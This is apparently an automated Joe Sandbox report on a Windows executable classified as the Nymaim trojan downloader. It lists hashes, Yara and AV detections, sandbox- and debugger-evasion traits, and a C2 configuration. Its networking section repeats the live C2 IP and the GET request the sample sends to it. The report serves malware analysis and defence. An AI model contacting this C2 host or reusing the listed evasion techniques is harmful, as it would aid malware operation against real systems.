Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565613
MD5:97e06acdd95db30f5421cd163f25ec93
SHA1:fc2e75139c5d25a46c3fa0e7a0ebe032dca3519a
SHA256:df1e3b3a4009381af205e8b587bb0f8b199793968dacc09822091a5c218a3002
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 97E06ACDD95DB30F5421CD163F25EC93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.file.exe.4940e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.3.file.exe.4a30000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#hAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&FiAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;bAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj%Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%ChAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubShAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKcAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKbAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;cAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a30000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeVirustotal: Detection: 44%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04943837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04943837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h
                Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc
                Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh
                Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi
                Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj%
                Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkb
                Source: file.exe, 00000000.00000002.4109269730.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E507D0_2_005E507D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D483A0_2_005D483A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004778370_2_00477837
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4CAF0_2_004F4CAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D2D710_2_005D2D71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E01690_2_005E0169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B990D0_2_005B990D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E29970_2_005E2997
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004739B60_2_004739B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005909AA0_2_005909AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB20F0_2_005DB20F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D62D50_2_005D62D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C97170_2_005C9717
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D97F20_2_005D97F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00515FB10_2_00515FB1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049451D70_2_049451D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494EE2E0_2_0494EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04943FA70_2_04943FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049559950_2_04955995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049451D70_2_049451D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494B9370_2_0494B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494F1700_2_0494F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04950BA70_2_04950BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0494AA07 appears 34 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9942525875796179
                Source: file.exeStatic PE information: Section: zeyoifdy ZLIB complexity 0.9922996438720489
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04798464 CreateToolhelp32Snapshot,Module32First,0_2_04798464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeVirustotal: Detection: 44%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2028032 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of zeyoifdy is bigger than: 0x100000 < 0x1ace00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zeyoifdy:EW;tiucznkd:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1fa19c should be: 0x1f6a0c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: zeyoifdy
                Source: file.exeStatic PE information: section name: tiucznkd
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F907E push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA02B push 2FE5EA4Ah; mov dword ptr [esp], edx0_2_006FA04C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066002A push edi; mov dword ptr [esp], 7FF67FE6h0_2_0066004E
